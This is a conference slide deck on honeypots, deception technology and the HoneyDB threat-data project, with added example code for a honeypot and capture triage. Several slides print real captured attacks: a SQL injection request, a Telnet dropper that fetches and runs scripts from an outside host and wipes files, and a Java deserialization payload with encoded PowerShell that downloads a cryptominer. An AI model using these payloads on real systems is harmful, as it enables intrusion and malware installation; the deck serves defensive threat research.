Honeypots, Deception, and Frankenstein
CarolinaCon 14
BIO
Career Summary
● WebDev, DBA, SA, IT Auditor (~7 yrs)
● AppSec in Financials, EY & GS (~9 yrs)
On the socials
● Twitter: @foospidy
● Github: http://github.com/foospidy
● LinkedIn: http://linkedin.pxmx.io
● Blog: http://pxmx.io
Phillip Maddux
Trusted AppSec Advisor and
Senior Solutions Engineer
@ Signal Sciences
https://signalsciences.com
CarolinaCon 14
Community
Meet Ups!
Conferences!
Community
September 29, 2018
https://www.wakeforestdancefestival.org
Agenda of the Cybers
● Honeypots 101
● Cyber Deception
● HoneyPy - Quick Update
● Frankenstein (HoneyDB Project)
● Q&A
Honeypots 101
A networked computer configured to look like a legitimate system, but its real purpose is to discover and/or track attackers.
Types of Honeypots:
- Production
- Research
Levels of Interaction:
- Low: Emulated services, very limited interaction, no login capability (low risk).
- Medium: Emulated services, emulated login, emulated commands.
- High: Actual services, system logins, and commands (very risky).
Honeypots 101 - Production Honeypots
Production honeypots are computers on the network that have no legitimate business purpose and should never see any traffic, unless:
- Something is misconfigured on the network
- A malicious actor is on the network
Production honeypots are an additional layer to your defense strategy.
- Honeypot logs are low volume and high value
- Honeypots introduce risk to the attacker
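An added example (not HoneyPy or HoneyDB code) of the "Low" interaction level above: a Telnet-style listener that shows a banner, records whatever the client sends as one JSON event, never grants a login, and treats every connection as an alert unless it comes from an address you list as your own vulnerability scanner. The scanner address 192.0.2.10 and port 2323 are constructed; only serve() touches the network.

```python
"""Low-interaction Telnet-style honeypot: banner, capture, deny.

Added example, not HoneyPy code. Every connection becomes one JSON event
(the low-volume, high-value log the slide talks about), and any event not
from an allow-listed scanner is an alert.
"""
import asyncio
import json
import time
from typing import Iterable, Optional

BANNER = b"\r\nUbuntu 16.04 LTS\r\nlogin: "  # emulated prompt; there is no real login behind it
DENY = b"\r\nLogin incorrect\r\n"
SCANNER_IPS = {"192.0.2.10"}  # constructed: your own vuln scanner, which will hit the sensor too


def printable(data: bytes) -> str:
    """Lossy ASCII rendering for a human reader; the hex field keeps the exact bytes."""
    return "".join(chr(b) if 32 <= b < 127 else "." for b in data)


def build_event(remote_ip: str, remote_port: int, local_port: int, data: bytes,
                service: str = "telnet", ts: Optional[float] = None) -> dict:
    """One honeypot event: who connected, to which emulated service, and what they sent."""
    return {
        "ts": ts if ts is not None else time.time(),
        "service": service,
        "remote_ip": remote_ip,
        "remote_port": remote_port,
        "local_port": local_port,
        "bytes": len(data),
        "data_hex": data.hex(),        # exact bytes, survives binary payloads
        "data_text": printable(data),  # what an analyst reads first
    }


def should_alert(event: dict, scanner_ips: Iterable[str] = ()) -> bool:
    """Production-honeypot rule: nothing legitimate ever talks to the sensor, so every
    connection is an alert unless it comes from your own scanner."""
    return event["remote_ip"] not in set(scanner_ips)


async def handle(reader: asyncio.StreamReader, writer: asyncio.StreamWriter) -> None:
    remote_ip, remote_port = writer.get_extra_info("peername")[:2]
    local_port = writer.get_extra_info("sockname")[1]
    writer.write(BANNER)
    await writer.drain()
    try:
        # Capture at most one read, then stop: low interaction means no emulated shell.
        data = await asyncio.wait_for(reader.read(1024), timeout=10)
    except asyncio.TimeoutError:
        data = b""
    event = build_event(remote_ip, remote_port, local_port, data)
    event["alert"] = should_alert(event, SCANNER_IPS)
    print(json.dumps(event))  # ship this line to your logger/SIEM
    writer.write(DENY)
    await writer.drain()
    writer.close()


async def serve(host: str = "0.0.0.0", port: int = 2323) -> None:
    server = await asyncio.start_server(handle, host, port)
    async with server:
        await server.serve_forever()


if __name__ == "__main__":
    asyncio.run(serve())
```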
Honeypots 101 - Production Honeypots
Additional Layer to

Preventative controls
- Network & application firewalls
- Intrusion prevention systems
- Patch management
- Network compartmentalization
- Anti-virus
Detective controls
- Intrusion detection systems
- Network traffic analysis
- Endpoint monitoring
Control validation
- Vulnerability scans
- Audits
- Penetration testing
- Control performance monitoring
Honeypots
- Produce low volumes of data compared to the volumes of data from all other preventative and detective controls
Honeypots 101 - Research Honeypots
Research honeypots can serve many purposes; it depends on what the research goals are.
Examples:
- Identify sources of malicious traffic
- Discover active malware, botnets, and C&C servers
- Learn about attacker techniques & tools
Honeypots 101 - Research Honeypots
(Diagram: Internet traffic sources such as bots, scanners, malware, DDoS botnets, etc.)
Honeypots 101 - Research Honeypots
ShmooCon 2015
Andrew Morris (@Andrew___Morris): No Budget Threat Intelligence - Tracking Malware Campaigns on the Cheap
- Reversing malware
- Uncovering c2 servers
- Uncovering imminent ddos attacks
Presentation video
Now doing really cool stuff with GreyNoise (https://greynoise.io/)
Honeypots 101 - Hobbyist Honeypots
- Try it out.
- It’s fun!
This is not me.
(this is totally me)
Cyber Deception
The First Rule of Cyber Deception
Image Source
You Must Show This Image
Deception
Deception technology automates the creation of traps (decoys) and/or lures which are mixed among and within existing IT resources to provide a layer of protection to stop attackers that have penetrated the network. Traps (decoys) are IT assets that either use real licensed operating system software, or are emulations of these devices. [1]
1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
Deception Automation
Automation for:
- Deploying deception endpoints as VMs, containers, or processes.
- Configuration of deception endpoints.
Centralized management interface, or API driven.
Deception Lures
Lures (aka breadcrumbs) - Lures are generally real information technology resources (files of varying kinds) which are placed on actual IT assets. [1]
- Credentials to network resources or applications.
- Shortcuts to applications or other services, e.g. FTP, Telnet, SSH.
- Browser artifacts, e.g. history, favorites, cookies.
- Database connection strings
- Network drives
- etc.
1. https://en.wikipedia.org/wiki/Deception_technology#Technology:_high_level_view
Deception Solutions
Very fancy implementations of honeypots
Deception Layers
Network services - SSH, Telnet, FTP, etc.
Applications - cookies, directories, logins, functionality, etc.
Data - watermarks, triggers, records access, etc.
Deception in Applications
2017
Herb Todd: Tangled Web: Defense in Deception
- The goals of deception from the perspective of both the attacker and defender
- The elements and processes needed to plan, prepare, execute, and monitor effective deception
- The types of deception techniques that are effective and how they translate into actual web application capabilities
- How to identify and respond to various types of attackers.
Presentation video
My takeaway - a tailored solution is needed
See, told ya.
Deception Goal
Integrate deception throughout your network and applications
so you become a high risk to attackers
Deception Market
Approximately 20 companies
Raised at least 201 million dollars
Top 5 funded range 19 million to 46 million
2 acquisitions
All this over the last 4, maybe 5 years
Numbers based on data from crunchbase.com as of Fall 2017
Deception Challenges
The concept of honeypots & deception has been around for years
The Cuckoo’s Egg - 1989
Bsides Raleigh 2017 (now Bsides RDU) source
Deception Challenges
Why isn’t everyone already doing deception?
Deception Challenges
Maturity
Deception Challenges
Over the last 10 to 15 years organizations have focused on getting the basics done
● Vulnerability Assessment
● Patch Management
● Endpoint protection
● Network Monitoring (IDS/IPS)
● Controls Validation
● Security awareness / training
Deception
● No resources
● Not a priority
● Not fully understood
Deception Challenges
However, as organizations are becoming more mature in their security programs they are now thinking about deception.
What does a deception program look like for their organization?
Deception Program
Initial thoughts
● Scope... intruder vs. insider, or both?
● Output... alerts vs. counter intelligence, or both?
● Coverage... external vs. internal, or both?
● Assets... network, applications, data?
● Validation... metrics and testing.
● Incident response... integration and prioritization.
Audit & Compliance?
Deception Challenges
Some other challenges

● Some existing solutions are heavy to deploy.
● Lures & breadcrumb management.
● Vulnerability scans reporting on sensors.
● Deception data risk (data is fake, incident is real).
● External facing deception can have an impact on security scorecard.
● How to implement deception in 3rd party vendor environments.
Deception Takeaways
Get the basics covered first
Think about your deception story (program)
Investigate solutions that are right sized for your organization’s maturity level
A solution needs to:
- have capability to be tailored
- be easy to deploy
- be easy to automate and integrate
- be light weight / low touch to manage
Deception Takeaways
Effective Deception
Project Updates
HoneyPy
- Low to medium interaction honeypot.
- Plugin-based: plugins implement the various network services (TCP or UDP).
- Open source, on Github https://github.com/foospidy/HoneyPy
- Written in Python.
- Plugins
- https://github.com/foospidy/HoneyPy/tree/master/plugins
- Service config
- https://github.com/foospidy/HoneyPy/blob/master/etc/services.cfg
- Integrations (loggers)
- https://github.com/foospidy/HoneyPy/tree/master/loggers
June
Meetup
HoneyDB
HoneyDB is a community driven honeypot data aggregation service. HoneyDB collects and publishes honeypot data via its web site and APIs.
honeydb.io
(redirects to riskdiscovery.com/honeydb)
HoneyDB - Features
Data visualization

HoneyDB - Features
Investigation

HoneyDB - Features
Threat Info API
- Bad-hosts
- Sensor Data
- Twitter Threat Feed
Tools

API Wrapper / CLI
https://github.com/foospidy/honeydb-python
Console
https://github.com/NullArray/Mimir
HoneyDB
How does it work?
HoneyDB - Original Architecture
Web API
HoneyDB - Scale Problem
Web API
HoneyDB - Reliability Problem
Fun reading

http://www.cloudatacost.com/mystory
https://www.reddit.com/r/CloudAtCost/
HoneyDB - $$$?
Decent web servers and data storage could run about $400-$500 per month.
Current 90 day storage 50 GB
HoneyDB - How To Get $$$?
Idea

Honeypots As A Service
(HaaS)
HoneyDB - You Have To HaaS it!
HoneyDB - Turns Out You Don’t Have To HaaS it!
Or nobody wants to HaaS it =(
HoneyDB - But Wait, CarolinaCon Connection!
http://novcon.net/
Offered VMs for free!
btw, they also operate the threat info project.
HoneyDB - Reliable Servers
But still need to scale
HoneyDB - Frankenstein
HoneyDB - Frankenstein Cloud Architecture
“Frankenstein scaaaaaaaaaaaaale”
- Frankenstein
HoneyDB - Frankenstein Cloud Architecture
(Architecture diagram. Components: serverless functions, Google Cloud BigQuery, PubSub, Novcon VMs running the HoneyDB web / API, MySQL primary and MySQL secondary. Edge labels: get hmac, post events, pull events, pull tweets, replicate, query, inserts, stream events, TBD.)
HoneyDB - What about...
Blockchain?
HoneyDB - Blockchain?
Not yet.
HoneyDB - Note On Serverless Functions
IBM Cloud Functions is THE BEST - deploy easily/quickly, lowest cost.
AWS Lambda is good - robust, but expensive API gateway charges.
Google Cloud Functions is disappointing - easy to deploy, only nodejs, but Google functions using Google library talking to Google PubSub resulted in tons of errors. Wait. What? Why?
Azure Cloud Functions is WTF - couldn’t get dependencies to install, never got it running, couldn’t waste more time with it.
HoneyDB - Ok, So What Does It Cost?
HoneyDB - How To Money?
Cryptocurrency Mining...
HoneyDB - How To Money?
Not practical, but wrote a cool script...
HoneyMiner
https://github.com/foospidy/HoneyMiner
HoneyDB - How To Money?
Masternodes

Greater privacy of transactions
Performing immediate transactions
Participation in proceedings and voting
Activate budgeting and cashier system in cryptocurrencies
HoneyDB - How To Money?
Currently running 5 masternodes
across 2 VPS
Yields about $100 to $200 per month.
HoneyDB - But that crypto though.
Masternodes have potential, but require an initial investment, and are at the mercy of market volatility.
HoneyDB - How to money?
Other options

Sponsorships
Commercial Licensing
HoneyDB - Back To HaaS
Tools to get you honeypotting
● Honeydb-agent
○ Like HoneyPy, but a binary
● API Endpoints
● HoneyDB CLI
HoneyDB - New API Endpoints
● Bad-host (filtered)
● Sensor Data Count (filtered)
● Sensor Data (filtered)
Filtered means it’s only the data from your sensors.
HoneyDB - New API Client Wrapper and CLI
pip install honeydb
usage: honeydb [-h] [--bad-hosts] [--sensor-data-count] [--sensor-data] [--threatbin] [--twitter-threat-feed] [--mydata] [--date DATE] [--ip-address IP_ADDRESS] [--from-id FROM_ID] [--pretty]
optional arguments:
-h, --help show this help message and exit
--bad-hosts Get bad hosts.
--sensor-data-count Get sensor data count.
--sensor-data Get sensor data.
--threatbin Get ThreatBin entries.
--twitter-threat-feed Get Twitter Threat Feed.
--mydata Filter on mydata.
--date DATE Date in format YYYY-MM-DD
--ip-address IP_ADDRESS IP address to filter on.
--from-id FROM_ID ID to continue retrieving sensor data.
--pretty Print JSON in pretty format.
HoneyDB - Examples...
Web
GET /hcl/inc/install/checkout.asp?cartid1111111111111'%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),CHAR(45,120,50,45,81,45)--%20%20 HTTP/1.1
Host: x.x.x.x
Accept: */*
Telnet
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.76.233.99/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 45.76.233.99 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 45.76.233.99; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 45.76.233.99 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *
HoneyDB - Examples...
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 64.137.163.142:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1216
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E
JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALg
BDAGEAcAB0AGkAbwBuADsAJABXAEMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAVwBDAC4ASABlAGEAZABlAHIAc
wAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAiAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADIALgAwACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQw
AuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMwAuADUAOQAuADYAOAAuADEANwAyAC8AQwBhAGMAaABlAC8ARABMAC4
AcABoAHAAJwApADsA</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
HoneyDB - Examples...
$.O.S.=.(.G.e.t.-.W.m.i.O.b.j.e.c.t. .-.C.l.a.s.s.
.W.i.n.3.2._.O.p.e.r.a.t.i.n.g.S.y.s.t.e.m.)...C.a.p.t.i.o.n.;.$.W
.C.=.N.e.w.-.O.b.j.e.c.t.
.N.e.t...W.e.b.C.l.i.e.n.t.;.$.W.C...H.e.a.d.e.r.s...A.d.d.(.'.U.s
.e.r.-.A.g.e.n.t.'.,.".P.o.w.e.r.S.h.e.l.l. .v.2...0.
.$.O.S.".).;.I.E.X.
.$.W.C...D.o.w.n.l.o.a.d.S.t.r.i.n.g.(.'.h.t.t.p.:././.1.2.3...5.9
...6.8...1.7.2./.C.a.c.h.e./.D.L...p.h.p.'.).;.
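An added triage helper (example code, not HoneyDB's or the author's) for captures of the three kinds shown on these slides: it URL-decodes the request, recognises the XMLDecoder/ProcessBuilder body, decodes the PowerShell -E argument (base64 over UTF-16LE text, which is why the raw decode above shows a dot between every letter), and lists the URLs and addresses to hand to incident response. The sample captures are constructed with TEST-NET addresses; nothing in them is a real indicator.

```python
"""Triage of honeypot captures: classify, decode embedded PowerShell, extract indicators.

Added example. Sample captures are constructed and use TEST-NET addresses only.
"""
import base64
import re
from typing import Iterable, Optional
from urllib.parse import unquote

URL_RE = re.compile(r"https?://[^\s'\"<>);,]+", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-E, -Ec, -Enc ...);
# the argument is base64 over the UTF-16LE bytes of the script.
ENC_RE = re.compile(r"-E(?:ncodedCommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def decode_encoded_powershell(text: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None.

    Decoding the base64 and viewing it as ASCII gives the 'dotted' text on the slide
    above: every other byte of UTF-16LE is NUL. Decoding as UTF-16LE gives the script.
    """
    m = ENC_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def classify(capture: str) -> str:
    """Coarse bucket for the (already URL-decoded) capture, matching the slide examples."""
    low = capture.lower()
    if "java.beans.xmldecoder" in low or "java.lang.processbuilder" in low:
        return "java-deserialization"
    if re.search(r"\b(wget|curl|tftp|ftpget)\b", low) and re.search(r"\b(chmod|sh)\b", low):
        return "shell-dropper"
    if re.search(r"union\s+(all\s+)?select", low) or "char(" in low:
        return "sql-injection"
    return "unknown"


def triage(capture: str, sensor_ips: Iterable[str] = ()) -> dict:
    """URL-decode, classify, decode any embedded PowerShell, and pull out indicators.

    sensor_ips: your own honeypot addresses, so the Host header is not reported
    as an attacker indicator.
    """
    decoded = unquote(capture)
    ps = decode_encoded_powershell(decoded)
    searchable = decoded if ps is None else decoded + "\n" + ps
    own = set(sensor_ips)
    return {
        "kind": classify(decoded),
        "urls": sorted(set(URL_RE.findall(searchable))),
        "ips": sorted(ip for ip in set(IPV4_RE.findall(searchable)) if ip not in own),
        "powershell": ps,
    }


# Constructed samples modelled on the slides' captures (192.0.2.1 plays the sensor).
SAMPLE_GET = (
    "GET /shop/checkout.asp?cartid=1'%20UNION%20SELECT%20CHAR(45,120,49,45,81,45),"
    "CHAR(45,120,50,45,81,45)--%20%20 HTTP/1.1\r\nHost: 192.0.2.1\r\nAccept: */*\r\n"
)
SAMPLE_TELNET = (
    "cd /tmp || cd /var/run || cd /; wget http://203.0.113.5/bins.sh; chmod 777 bins.sh; "
    "sh bins.sh; tftp 203.0.113.5 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; "
    "rm -rf bins.sh tftp1.sh"
)
_SCRIPT = "$WC=New-Object Net.WebClient;$WC.DownloadString('http://203.0.113.10/sample/DL.php')"
_ENCODED = base64.b64encode(_SCRIPT.encode("utf-16le")).decode("ascii")
SAMPLE_POST = (
    "POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\nHost: 192.0.2.1:7001\r\n"
    "Content-Type: text/xml\r\n\r\n"
    '<java version="1.8.0_131" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder">'
    '<array class="java.lang.String" length="3"><void index="0"><string>cmd.exe</string></void>'
    '<void index="1"><string>/c</string></void><void index="2"><string>PowerShell.exe -NoP -NonI '
    f'-EP ByPass -W Hidden -E {_ENCODED}</string></void></array><void method="start"/></void></java>'
)

if __name__ == "__main__":
    for name, capture in (("web", SAMPLE_GET), ("telnet", SAMPLE_TELNET), ("soap", SAMPLE_POST)):
        print(name, triage(capture, sensor_ips={"192.0.2.1"}))
```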
HoneyDB - @MalwareMechanic
● I analyzed the initial POST you sent me. From there I was able to pull apart a scanner/worm/RAT!
● It appears to be GhostMiner to mine Monero!
HoneyDB - Hmmmmm...
$ cat GhostMiner >> HoneyMiner
HoneyDB - No no no no...
HoneyDB - @MalwareMechanic
● This POST utilizes a Java deserialization
vulnerability to execute a base64 encoded
PowerShell command.
● This in turn downloads and executes a PowerShell
script (hxxp://123.59.68.172/Cache/DL.php).
● Installs a cryptominer via WMI.
● Attempts to stop the various services & tasks
before installing the new miner.
● Attempts to stop other miners.
● Attempts to stop processes listening on specific
ports.
● Also saw references to
powershell_reflective_mimikatz.
HoneyDB - Go Forth and Honeypot!
honeydb.io
Thanks!
Questions?

Shift Left. Wait, what? No, Shift Right!!!Phillip Maddux
 
SecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operationsSecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operationsPhillip Maddux
 
Application security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOpsApplication security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOpsPhillip Maddux
 
HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)Phillip Maddux
 
HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)Phillip Maddux
 
HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)Phillip Maddux
 

Mehr von Phillip Maddux (7)

The left is not wrong, just not right; It's time to shift right!
The left is not wrong, just not right; It's time to shift right!The left is not wrong, just not right; It's time to shift right!
The left is not wrong, just not right; It's time to shift right!
 
Shift Left. Wait, what? No, Shift Right!!!
Shift Left. Wait, what? No, Shift Right!!!Shift Left. Wait, what? No, Shift Right!!!
Shift Left. Wait, what? No, Shift Right!!!
 
SecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operationsSecOps Armageddon: A look into the future of security & operations
SecOps Armageddon: A look into the future of security & operations
 
Application security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOpsApplication security for the modern web - ISSA South Texas Houston DevOps
Application security for the modern web - ISSA South Texas Houston DevOps
 
HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)HoneyPy & HoneyDB (TriPython)
HoneyPy & HoneyDB (TriPython)
 
HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)HoneyPy & HoneyDB (CarolinaCon 13)
HoneyPy & HoneyDB (CarolinaCon 13)
 
HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)HoneyPy Honeypot (OWASP Triangle Chapter)
HoneyPy Honeypot (OWASP Triangle Chapter)
 

KĂŒrzlich hochgeladen

Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel AraĂșjo
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 

KĂŒrzlich hochgeladen (20)

Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...Workshop - Best of Both Worlds_ Combine  KG and Vector search for  enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
